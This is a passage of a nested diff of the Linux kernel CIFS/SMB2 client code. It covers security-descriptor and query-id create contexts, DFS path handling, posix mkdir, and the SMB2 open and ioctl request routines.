+-	sids->group.SubAuthorities[1] = cpu_to_le32(2);
+-	sids->group.SubAuthorities[2] = cpu_to_le32(current_fsgid().val);
+-
+-	cifs_dbg(FYI, "owner S-1-5-88-1-%d, group S-1-5-88-2-%d\n", current_fsuid().val, current_fsgid().val);
+-}
+-
+-/* See MS-SMB2 2.2.13.2.2 and MS-DTYP 2.4.6 */
+-static struct crt_sd_ctxt *
+-create_sd_buf(umode_t mode, bool set_owner, unsigned int *len)
+-{
+-	struct crt_sd_ctxt *buf;
+-	__u8 *ptr, *aclptr;
+-	unsigned int acelen, acl_size, ace_count;
+-	unsigned int owner_offset = 0;
+-	unsigned int group_offset = 0;
+-	struct smb3_acl acl = {};
+-
+-	*len = round_up(sizeof(struct crt_sd_ctxt) + (sizeof(struct cifs_ace) * 4), 8);
+-
+-	if (set_owner) {
+-		/* sizeof(struct owner_group_sids) is already multiple of 8 so no need to round */
+-		*len += sizeof(struct owner_group_sids);
+-	}
+-
+-	buf = kzalloc(*len, GFP_KERNEL);
+-	if (buf == NULL)
+-		return buf;
+-
+-	ptr = (__u8 *)&buf[1];
+-	if (set_owner) {
+-		/* offset fields are from beginning of security descriptor not of create context */
+-		owner_offset = ptr - (__u8 *)&buf->sd;
+-		buf->sd.OffsetOwner = cpu_to_le32(owner_offset);
+-		group_offset = owner_offset + offsetof(struct owner_group_sids, group);
+-		buf->sd.OffsetGroup = cpu_to_le32(group_offset);
+-
+-		setup_owner_group_sids(ptr);
+-		ptr += sizeof(struct owner_group_sids);
+-	} else {
+-		buf->sd.OffsetOwner = 0;
+-		buf->sd.OffsetGroup = 0;
+-	}
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof(struct crt_sd_ctxt, sd));
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof(struct crt_sd_ctxt, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_SD_BUFFER_TOKEN is "SecD" */
+-	buf->Name[0] = 'S';
+-	buf->Name[1] = 'e';
+-	buf->Name[2] = 'c';
+-	buf->Name[3] = 'D';
+-	buf->sd.Revision = 1;  /* Must be one see MS-DTYP 2.4.6 */
+-
+-	/*
+-	 * ACL is "self relative" ie ACL is stored in contiguous block of memory
+-	 * and "DP" ie the DACL is present
+-	 */
+-	buf->sd.Control = cpu_to_le16(ACL_CONTROL_SR | ACL_CONTROL_DP);
+-
+-	/* offset owner, group and Sbz1 and SACL are all zero */
+-	buf->sd.OffsetDacl = cpu_to_le32(ptr - (__u8 *)&buf->sd);
+-	/* Ship the ACL for now. we will copy it into buf later. */
+-	aclptr = ptr;
+-	ptr += sizeof(struct smb3_acl);
+-
+-	/* create one ACE to hold the mode embedded in reserved special SID */
+-	acelen = setup_special_mode_ACE((struct cifs_ace *)ptr, (__u64)mode);
+-	ptr += acelen;
+-	acl_size = acelen + sizeof(struct smb3_acl);
+-	ace_count = 1;
+-
+-	if (set_owner) {
+-		/* we do not need to reallocate buffer to add the two more ACEs. plenty of space */
+-		acelen = setup_special_user_owner_ACE((struct cifs_ace *)ptr);
+-		ptr += acelen;
+-		acl_size += acelen;
+-		ace_count += 1;
+-	}
+-
+-	/* and one more ACE to allow access for authenticated users */
+-	acelen = setup_authusers_ACE((struct cifs_ace *)ptr);
+-	ptr += acelen;
+-	acl_size += acelen;
+-	ace_count += 1;
+-
+-	acl.AclRevision = ACL_REVISION; /* See 2.4.4.1 of MS-DTYP */
+-	acl.AclSize = cpu_to_le16(acl_size);
+-	acl.AceCount = cpu_to_le16(ace_count);
+-	/* acl.Sbz1 and Sbz2 MBZ so are not set here, but initialized above */
+-	memcpy(aclptr, &acl, sizeof(struct smb3_acl));
+-
+-	buf->ccontext.DataLength = cpu_to_le32(ptr - (__u8 *)&buf->sd);
+-	*len = round_up((unsigned int)(ptr - (__u8 *)buf), 8);
+-
+-	return buf;
+-}
+-
+-static int
+-add_sd_context(struct kvec *iov, unsigned int *num_iovec, umode_t mode, bool set_owner)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-	unsigned int len = 0;
+-
+-	iov[num].iov_base = create_sd_buf(mode, set_owner, &len);
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = len;
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset = cpu_to_le32(
+-				sizeof(struct smb2_create_req) +
+-				iov[num - 1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, len);
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-static struct crt_query_id_ctxt *
+-create_query_id_buf(void)
+-{
+-	struct crt_query_id_ctxt *buf;
+-
+-	buf = kzalloc(sizeof(struct crt_query_id_ctxt), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(0);
+-	buf->ccontext.DataLength = cpu_to_le32(0);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct crt_query_id_ctxt, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_QUERY_ON_DISK_ID is "QFid" */
+-	buf->Name[0] = 'Q';
+-	buf->Name[1] = 'F';
+-	buf->Name[2] = 'i';
+-	buf->Name[3] = 'd';
+-	return buf;
+-}
+-
+-/* See MS-SMB2 2.2.13.2.9 */
+-static int
+-add_query_id_context(struct kvec *iov, unsigned int *num_iovec)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	iov[num].iov_base = create_query_id_buf();
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct crt_query_id_ctxt);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset = cpu_to_le32(
+-				sizeof(struct smb2_create_req) +
+-				iov[num - 1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, sizeof(struct crt_query_id_ctxt));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-static int
+-alloc_path_with_tree_prefix(__le16 **out_path, int *out_size, int *out_len,
+-			    const char *treename, const __le16 *path)
+-{
+-	int treename_len, path_len;
+-	struct nls_table *cp;
+-	const __le16 sep[] = {cpu_to_le16('\\'), cpu_to_le16(0x0000)};
+-
+-	/*
+-	 * skip leading "\\"
+-	 */
+-	treename_len = strlen(treename);
+-	if (treename_len < 2 || !(treename[0] == '\\' && treename[1] == '\\'))
+-		return -EINVAL;
+-
+-	treename += 2;
+-	treename_len -= 2;
+-
+-	path_len = UniStrnlen((wchar_t *)path, PATH_MAX);
+-
+-	/* make room for one path separator only if @path isn't empty */
+-	*out_len = treename_len + (path[0] ? 1 : 0) + path_len;
+-
+-	/*
+-	 * final path needs to be 8-byte aligned as specified in
+-	 * MS-SMB2 2.2.13 SMB2 CREATE Request.
+-	 */
+-	*out_size = round_up(*out_len * sizeof(__le16), 8);
+-	*out_path = kzalloc(*out_size + sizeof(__le16) /* null */, GFP_KERNEL);
+-	if (!*out_path)
+-		return -ENOMEM;
+-
+-	cp = load_nls_default();
+-	cifs_strtoUTF16(*out_path, treename, treename_len, cp);
+-
+-	/* Do not append the separator if the path is empty */
+-	if (path[0] != cpu_to_le16(0x0000)) {
+-		UniStrcat(*out_path, sep);
+-		UniStrcat(*out_path, path);
+-	}
+-
+-	unload_nls(cp);
+-
+-	return 0;
+-}
+-
+-int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
+-			       umode_t mode, struct cifs_tcon *tcon,
+-			       const char *full_path,
+-			       struct cifs_sb_info *cifs_sb)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_create_req *req;
+-	struct smb2_create_rsp *rsp = NULL;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct kvec iov[3]; /* make sure at least one for each open context */
+-	struct kvec rsp_iov = {NULL, 0};
+-	int resp_buftype;
+-	int uni_path_len;
+-	__le16 *copy_path = NULL;
+-	int copy_size;
+-	int rc = 0;
+-	unsigned int n_iov = 2;
+-	__u32 file_attributes = 0;
+-	char *pc_buf = NULL;
+-	int flags = 0;
+-	unsigned int total_len;
+-	__le16 *utf16_path = NULL;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-
+-	cifs_dbg(FYI, "mkdir\n");
+-
+-	/* resource #1: path allocation */
+-	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	if (!ses || !server) {
+-		rc = -EIO;
+-		goto err_free_path;
+-	}
+-
+-	/* resource #2: request */
+-	rc = smb2_plain_req_init(SMB2_CREATE, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		goto err_free_path;
+-
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	req->ImpersonationLevel = IL_IMPERSONATION;
+-	req->DesiredAccess = cpu_to_le32(FILE_WRITE_ATTRIBUTES);
+-	/* File attributes ignored on open (used in create though) */
+-	req->FileAttributes = cpu_to_le32(file_attributes);
+-	req->ShareAccess = FILE_SHARE_ALL_LE;
+-	req->CreateDisposition = cpu_to_le32(FILE_CREATE);
+-	req->CreateOptions = cpu_to_le32(CREATE_NOT_FILE);
+-
+-	iov[0].iov_base = (char *)req;
+-	/* -1 since last byte is buf[0] which is sent below (path) */
+-	iov[0].iov_len = total_len - 1;
+-
+-	req->NameOffset = cpu_to_le16(sizeof(struct smb2_create_req));
+-
+-	/* [MS-SMB2] 2.2.13 NameOffset:
+-	 * If SMB2_FLAGS_DFS_OPERATIONS is set in the Flags field of
+-	 * the SMB2 header, the file name includes a prefix that will
+-	 * be processed during DFS name normalization as specified in
+-	 * section 3.3.5.9. Otherwise, the file name is relative to
+-	 * the share that is identified by the TreeId in the SMB2
+-	 * header.
+-	 */
+-	if (tcon->share_flags & SHI1005_FLAGS_DFS) {
+-		int name_len;
+-
+-		req->hdr.Flags |= SMB2_FLAGS_DFS_OPERATIONS;
+-		rc = alloc_path_with_tree_prefix(&copy_path, &copy_size,
+-						 &name_len,
+-						 tcon->tree_name, utf16_path);
+-		if (rc)
+-			goto err_free_req;
+-
+-		req->NameLength = cpu_to_le16(name_len * 2);
+-		uni_path_len = copy_size;
+-		/* free before overwriting resource */
+-		kfree(utf16_path);
+-		utf16_path = copy_path;
+-	} else {
+-		uni_path_len = (2 * UniStrnlen((wchar_t *)utf16_path, PATH_MAX)) + 2;
+-		/* MUST set path len (NameLength) to 0 opening root of share */
+-		req->NameLength = cpu_to_le16(uni_path_len - 2);
+-		if (uni_path_len % 8 != 0) {
+-			copy_size = roundup(uni_path_len, 8);
+-			copy_path = kzalloc(copy_size, GFP_KERNEL);
+-			if (!copy_path) {
+-				rc = -ENOMEM;
+-				goto err_free_req;
+-			}
+-			memcpy((char *)copy_path, (const char *)utf16_path,
+-			       uni_path_len);
+-			uni_path_len = copy_size;
+-			/* free before overwriting resource */
+-			kfree(utf16_path);
+-			utf16_path = copy_path;
+-		}
+-	}
+-
+-	iov[1].iov_len = uni_path_len;
+-	iov[1].iov_base = utf16_path;
+-	req->RequestedOplockLevel = SMB2_OPLOCK_LEVEL_NONE;
+-
+-	if (tcon->posix_extensions) {
+-		/* resource #3: posix buf */
+-		rc = add_posix_context(iov, &n_iov, mode);
+-		if (rc)
+-			goto err_free_req;
+-		pc_buf = iov[n_iov-1].iov_base;
+-	}
+-
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = n_iov;
+-
+-	/* no need to inc num_remote_opens because we close it just below */
+-	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, full_path, CREATE_NOT_FILE,
+-				    FILE_WRITE_ATTRIBUTES);
+-	/* resource #4: response buffer */
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_CREATE_HE);
+-		trace_smb3_posix_mkdir_err(xid, tcon->tid, ses->Suid,
+-					   CREATE_NOT_FILE,
+-					   FILE_WRITE_ATTRIBUTES, rc);
+-		goto err_free_rsp_buf;
+-	}
+-
+-	/*
+-	 * Although unlikely to be possible for rsp to be null and rc not set,
+-	 * adding check below is slightly safer long term (and quiets Coverity
+-	 * warning)
+-	 */
+-	rsp = (struct smb2_create_rsp *)rsp_iov.iov_base;
+-	if (rsp == NULL) {
+-		rc = -EIO;
+-		kfree(pc_buf);
+-		goto err_free_req;
+-	}
+-
+-	trace_smb3_posix_mkdir_done(xid, rsp->PersistentFileId, tcon->tid, ses->Suid,
+-				    CREATE_NOT_FILE, FILE_WRITE_ATTRIBUTES);
+-
+-	SMB2_close(xid, tcon, rsp->PersistentFileId, rsp->VolatileFileId);
+-
+-	/* Eventually save off posix specific response info and timestaps */
+-
+-err_free_rsp_buf:
+-	free_rsp_buf(resp_buftype, rsp);
+-	kfree(pc_buf);
+-err_free_req:
+-	cifs_small_buf_release(req);
+-err_free_path:
+-	kfree(utf16_path);
+-	return rc;
+-}
+-
+-int
+-SMB2_open_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-	       struct smb_rqst *rqst, __u8 *oplock,
+-	       struct cifs_open_parms *oparms, __le16 *path)
+-{
+-	struct smb2_create_req *req;
+-	unsigned int n_iov = 2;
+-	__u32 file_attributes = 0;
+-	int copy_size;
+-	int uni_path_len;
+-	unsigned int total_len;
+-	struct kvec *iov = rqst->rq_iov;
+-	__le16 *copy_path;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_CREATE, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	iov[0].iov_base = (char *)req;
+-	/* -1 since last byte is buf[0] which is sent below (path) */
+-	iov[0].iov_len = total_len - 1;
+-
+-	if (oparms->create_options & CREATE_OPTION_READONLY)
+-		file_attributes |= ATTR_READONLY;
+-	if (oparms->create_options & CREATE_OPTION_SPECIAL)
+-		file_attributes |= ATTR_SYSTEM;
+-
+-	req->ImpersonationLevel = IL_IMPERSONATION;
+-	req->DesiredAccess = cpu_to_le32(oparms->desired_access);
+-	/* File attributes ignored on open (used in create though) */
+-	req->FileAttributes = cpu_to_le32(file_attributes);
+-	req->ShareAccess = FILE_SHARE_ALL_LE;
+-
+-	req->CreateDisposition = cpu_to_le32(oparms->disposition);
+-	req->CreateOptions = cpu_to_le32(oparms->create_options & CREATE_OPTIONS_MASK);
+-	req->NameOffset = cpu_to_le16(sizeof(struct smb2_create_req));
+-
+-	/* [MS-SMB2] 2.2.13 NameOffset:
+-	 * If SMB2_FLAGS_DFS_OPERATIONS is set in the Flags field of
+-	 * the SMB2 header, the file name includes a prefix that will
+-	 * be processed during DFS name normalization as specified in
+-	 * section 3.3.5.9. Otherwise, the file name is relative to
+-	 * the share that is identified by the TreeId in the SMB2
+-	 * header.
+-	 */
+-	if (tcon->share_flags & SHI1005_FLAGS_DFS) {
+-		int name_len;
+-
+-		req->hdr.Flags |= SMB2_FLAGS_DFS_OPERATIONS;
+-		rc = alloc_path_with_tree_prefix(&copy_path, &copy_size,
+-						 &name_len,
+-						 tcon->tree_name, path);
+-		if (rc)
+-			return rc;
+-		req->NameLength = cpu_to_le16(name_len * 2);
+-		uni_path_len = copy_size;
+-		path = copy_path;
+-	} else {
+-		uni_path_len = (2 * UniStrnlen((wchar_t *)path, PATH_MAX)) + 2;
+-		/* MUST set path len (NameLength) to 0 opening root of share */
+-		req->NameLength = cpu_to_le16(uni_path_len - 2);
+-		copy_size = round_up(uni_path_len, 8);
+-		copy_path = kzalloc(copy_size, GFP_KERNEL);
+-		if (!copy_path)
+-			return -ENOMEM;
+-		memcpy((char *)copy_path, (const char *)path,
+-		       uni_path_len);
+-		uni_path_len = copy_size;
+-		path = copy_path;
+-	}
+-
+-	iov[1].iov_len = uni_path_len;
+-	iov[1].iov_base = path;
+-
+-	if ((!server->oplocks) || (tcon->no_lease))
+-		*oplock = SMB2_OPLOCK_LEVEL_NONE;
+-
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_LEASING) ||
+-	    *oplock == SMB2_OPLOCK_LEVEL_NONE)
+-		req->RequestedOplockLevel = *oplock;
+-	else if (!(server->capabilities & SMB2_GLOBAL_CAP_DIRECTORY_LEASING) &&
+-		  (oparms->create_options & CREATE_NOT_FILE))
+-		req->RequestedOplockLevel = *oplock; /* no srv lease support */
+-	else {
+-		rc = add_lease_context(server, iov, &n_iov,
+-				       oparms->fid->lease_key, oplock);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	if (*oplock == SMB2_OPLOCK_LEVEL_BATCH) {
+-		/* need to set Next field of lease context if we request it */
+-		if (server->capabilities & SMB2_GLOBAL_CAP_LEASING) {
+-			struct create_context *ccontext =
+-			    (struct create_context *)iov[n_iov-1].iov_base;
+-			ccontext->Next =
+-				cpu_to_le32(server->vals->create_lease_size);
+-		}
+-
+-		rc = add_durable_context(iov, &n_iov, oparms,
+-					tcon->use_persistent);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	if (tcon->posix_extensions) {
+-		if (n_iov > 2) {
+-			struct create_context *ccontext =
+-			    (struct create_context *)iov[n_iov-1].iov_base;
+-			ccontext->Next =
+-				cpu_to_le32(iov[n_iov-1].iov_len);
+-		}
+-
+-		rc = add_posix_context(iov, &n_iov, oparms->mode);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	if (tcon->snapshot_time) {
+-		cifs_dbg(FYI, "adding snapshot context\n");
+-		if (n_iov > 2) {
+-			struct create_context *ccontext =
+-			    (struct create_context *)iov[n_iov-1].iov_base;
+-			ccontext->Next =
+-				cpu_to_le32(iov[n_iov-1].iov_len);
+-		}
+-
+-		rc = add_twarp_context(iov, &n_iov, tcon->snapshot_time);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	if ((oparms->disposition != FILE_OPEN) && (oparms->cifs_sb)) {
+-		bool set_mode;
+-		bool set_owner;
+-
+-		if ((oparms->cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID) &&
+-		    (oparms->mode != ACL_NO_MODE))
+-			set_mode = true;
+-		else {
+-			set_mode = false;
+-			oparms->mode = ACL_NO_MODE;
+-		}
+-
+-		if (oparms->cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
+-			set_owner = true;
+-		else
+-			set_owner = false;
+-
+-		if (set_owner | set_mode) {
+-			if (n_iov > 2) {
+-				struct create_context *ccontext =
+-				    (struct create_context *)iov[n_iov-1].iov_base;
+-				ccontext->Next = cpu_to_le32(iov[n_iov-1].iov_len);
+-			}
+-
+-			cifs_dbg(FYI, "add sd with mode 0x%x\n", oparms->mode);
+-			rc = add_sd_context(iov, &n_iov, oparms->mode, set_owner);
+-			if (rc)
+-				return rc;
+-		}
+-	}
+-
+-	if (n_iov > 2) {
+-		struct create_context *ccontext =
+-			(struct create_context *)iov[n_iov-1].iov_base;
+-		ccontext->Next = cpu_to_le32(iov[n_iov-1].iov_len);
+-	}
+-	add_query_id_context(iov, &n_iov);
+-
+-	rqst->rq_nvec = n_iov;
+-	return 0;
+-}
+-
+-/* rq_iov[0] is the request and is released by cifs_small_buf_release().
+- * All other vectors are freed by kfree().
+- */
+-void
+-SMB2_open_free(struct smb_rqst *rqst)
+-{
+-	int i;
+-
+-	if (rqst && rqst->rq_iov) {
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base);
+-		for (i = 1; i < rqst->rq_nvec; i++)
+-			if (rqst->rq_iov[i].iov_base != smb2_padding)
+-				kfree(rqst->rq_iov[i].iov_base);
+-	}
+-}
+-
+-int
+-SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms, __le16 *path,
+-	  __u8 *oplock, struct smb2_file_all_info *buf,
+-	  struct create_posix_rsp *posix,
+-	  struct kvec *err_iov, int *buftype)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_create_rsp *rsp = NULL;
+-	struct cifs_tcon *tcon = oparms->tcon;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	struct kvec iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec rsp_iov = {NULL, 0};
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	int rc = 0;
+-	int flags = 0;
+-
+-	cifs_dbg(FYI, "create/open\n");
+-	if (!ses || !server)
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst, oplock, oparms, path);
+-	if (rc)
+-		goto creat_exit;
+-
+-	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid, oparms->path,
+-		oparms->create_options, oparms->desired_access);
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags,
+-			    &rsp_iov);
+-	rsp = (struct smb2_create_rsp *)rsp_iov.iov_base;
+-
+-	if (rc != 0) {
+-		cifs_stats_fail_inc(tcon, SMB2_CREATE_HE);
+-		if (err_iov && rsp) {
+-			*err_iov = rsp_iov;
+-			*buftype = resp_buftype;
+-			resp_buftype = CIFS_NO_BUFFER;
+-			rsp = NULL;
+-		}
+-		trace_smb3_open_err(xid, tcon->tid, ses->Suid,
+-				    oparms->create_options, oparms->desired_access, rc);
+-		if (rc == -EREMCHG) {
+-			pr_warn_once("server share %s deleted\n",
+-				     tcon->tree_name);
+-			tcon->need_reconnect = true;
+-		}
+-		goto creat_exit;
+-	} else if (rsp == NULL) /* unlikely to happen, but safer to check */
+-		goto creat_exit;
+-	else
+-		trace_smb3_open_done(xid, rsp->PersistentFileId, tcon->tid, ses->Suid,
+-				     oparms->create_options, oparms->desired_access);
+-
+-	atomic_inc(&tcon->num_remote_opens);
+-	oparms->fid->persistent_fid = rsp->PersistentFileId;
+-	oparms->fid->volatile_fid = rsp->VolatileFileId;
+-	oparms->fid->access = oparms->desired_access;
+-#ifdef CONFIG_CIFS_DEBUG2
+-	oparms->fid->mid = le64_to_cpu(rsp->hdr.MessageId);
+-#endif /* CIFS_DEBUG2 */
+-
+-	if (buf) {
+-		buf->CreationTime = rsp->CreationTime;
+-		buf->LastAccessTime = rsp->LastAccessTime;
+-		buf->LastWriteTime = rsp->LastWriteTime;
+-		buf->ChangeTime = rsp->ChangeTime;
+-		buf->AllocationSize = rsp->AllocationSize;
+-		buf->EndOfFile = rsp->EndofFile;
+-		buf->Attributes = rsp->FileAttributes;
+-		buf->NumberOfLinks = cpu_to_le32(1);
+-		buf->DeletePending = 0;
+-	}
+-
+-
+-	smb2_parse_contexts(server, rsp, &oparms->fid->epoch,
+-			    oparms->fid->lease_key, oplock, buf, posix);
+-creat_exit:
+-	SMB2_open_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
+-
+-int
+-SMB2_ioctl_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		struct smb_rqst *rqst,
+-		u64 persistent_fid, u64 volatile_fid, u32 opcode,
+-		char *in_data, u32 indatalen,
+-		__u32 max_response_size)
+-{
+-	struct smb2_ioctl_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int total_len;
+-	int rc;
+-	char *in_data_buf;
+-
+-	rc = smb2_ioctl_req_init(opcode, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (indatalen) {
+-		/*
+-		 * indatalen is usually small at a couple of bytes max, so
+-		 * just allocate through generic pool
+-		 */
+-		in_data_buf = kmemdup(in_data, indatalen, GFP_NOFS);
+-		if (!in_data_buf) {
+-			cifs_small_buf_release(req);
+-			return -ENOMEM;
+-		}
+-	}
+-
+-	req->CtlCode = cpu_to_le32(opcode);
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-
+-	iov[0].iov_base = (char *)req;
+-	/*
+-	 * If no input data, the size of ioctl struct in
+-	 * protocol spec still includes a 1 byte data buffer,
+-	 * but if input data passed to ioctl, we do not
+-	 * want to double count this, so we do not send
+-	 * the dummy one byte of data in iovec[0] if sending
+-	 * input data (in iovec[1]).
+-	 */
+-	if (indatalen) {
+-		req->InputCount = cpu_to_le32(indatalen);
+-		/* do not set InputOffset if no input data */
+-		req->InputOffset =
+-		       cpu_to_le32(offsetof(struct smb2_ioctl_req, Buffer));
+-		rqst->rq_nvec = 2;
+-		iov[0].iov_len = total_len - 1;
+-		iov[1].iov_base = in_data_buf;
+-		iov[1].iov_len = indatalen;
+-	} else {
+-		rqst->rq_nvec = 1;
+-		iov[0].iov_len = total_len;
+-	}
+-
+-	req->OutputOffset = 0;
+-	req->OutputCount = 0; /* MBZ */
+-
+-	/*
+-	 * In most cases max_response_size is set to 16K (CIFSMaxBufSize)
+-	 * We Could increase default MaxOutputResponse, but that could require
+-	 * more credits. Windows typically sets this smaller, but for some
+-	 * ioctls it may be useful to allow server to send more. No point
+-	 * limiting what the server can send as long as fits in one credit
+-	 * We can not handle more than CIFS_MAX_BUF_SIZE yet but may want
+-	 * to increase this limit up in the future.
+-	 * Note that for snapshot queries that servers like Azure expect that
+-	 * the first query be minimal size (and just used to get the number/size
+-	 * of previous versions) so response size must be specified as EXACTLY
+-	 * sizeof(struct snapshot_array) which is 16 when rounded up to multiple
+-	 * of eight bytes.  Currently that is the only case where we set max
+-	 * response size smaller.
+-	 */
+-	req->MaxOutputResponse = cpu_to_le32(max_response_size);
+-	req->hdr.CreditCharge =
+-		cpu_to_le16(DIV_ROUND_UP(max(indatalen, max_response_size),
+-					 SMB2_MAX_BUFFER_SIZE));
+-	/* always an FSCTL (for now) */
+-	req->Flags = cpu_to_le32(SMB2_0_IOCTL_IS_FSCTL);
+-
+-	/* validate negotiate request must be signed - see MS-SMB2 3.2.5.5 */
+-	if (opcode == FSCTL_VALIDATE_NEGOTIATE_INFO)
+-		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
+-
+-	return 0;
+-}
+-
+-void
+-SMB2_ioctl_free(struct smb_rqst *rqst)
+-{
+-	int i;
+-	if (rqst && rqst->rq_iov) {
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-		for (i = 1; i < rqst->rq_nvec; i++)
+-			if (rqst->rq_iov[i].iov_base != smb2_padding)
+-				kfree(rqst->rq_iov[i].iov_base);
+-	}
+-}
+-
+-
+-/*
+- *	SMB2 IOCTL is used for both IOCTLs and FSCTLs
+- */
+-int
+-SMB2_ioctl(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
+-	   u64 volatile_fid, u32 opcode, char *in_data, u32 indatalen,
+-	   u32 max_out_data_len, char **out_data,
+-	   u32 *plen /* returned data len */)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_ioctl_rsp *rsp = NULL;
+-	struct cifs_ses *ses;
+-	struct TCP_Server_Info *server;
+-	struct kvec iov[SMB2_IOCTL_IOV_SIZE];
+-	struct kvec rsp_iov = {NULL, 0};
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	int rc = 0;
+-	int flags = 0;
+-
+-	cifs_dbg(FYI, "SMB2 IOCTL\n");
+-
+-	if (out_data != NULL)
+-		*out_data = NULL;
+-
+-	/* zero out returned data len, in case of error */
+-	if (plen)
+-		*plen = 0;
+-
+-	if (!tcon)
+-		return -EIO;
+-
+-	ses = tcon->ses;
+-	if (!ses)
+-		return -EIO;
+-
+-	server = cifs_pick_channel(ses);
+-	if (!server)
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = SMB2_IOCTL_IOV_SIZE;
+-
+-	rc = SMB2_ioctl_init(tcon, server,
+-			     &rqst, persistent_fid, volatile_fid, opcode,
+-			     in_data, indatalen, max_out_data_len);
+-	if (rc)
+-		goto ioctl_exit;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags,
+-			    &rsp_iov);
+-	rsp = (struct smb2_ioctl_rsp *)rsp_iov.iov_base;
+-
+-	if (rc != 0)
+-		trace_smb3_fsctl_err(xid, persistent_fid, tcon->tid,
+-				ses->Suid, 0, opcode, rc);
+-
+-	if ((rc != 0) && (rc != -EINVAL) && (rc != -E2BIG)) {
+-		cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
+-		goto ioctl_exit;
+-	} else if (rc == -EINVAL) {
+-		if ((opcode != FSCTL_SRV_COPYCHUNK_WRITE) &&
+-		    (opcode != FSCTL_SRV_COPYCHUNK)) {
+-			cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
+-			goto ioctl_exit;
+-		}
+-	} else if (rc == -E2BIG) {
+-		if (opcode != FSCTL_QUERY_ALLOCATED_RANGES) {
+-			cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
+-			goto ioctl_exit;
+-		}
+-	}
+-
+-	/* check if caller wants to look at return data or just return rc */
+-	if ((plen == NULL) || (out_data == NULL))
+-		goto ioctl_exit;
+-
+-	/*
+-	 * Although unlikely to be possible for rsp to be null and rc not set,
+-	 * adding check below is slightly safer long term (and quiets Coverity
+-	 * warning)
+-	 */
+-	if (rsp == NULL) {
+-		rc = -EIO;
+-		goto ioctl_exit;
+-	}
+-
+-	*plen = le32_to_cpu(rsp->OutputCount);
+-
+-	/* We check for obvious errors in the output buffer length and offset */
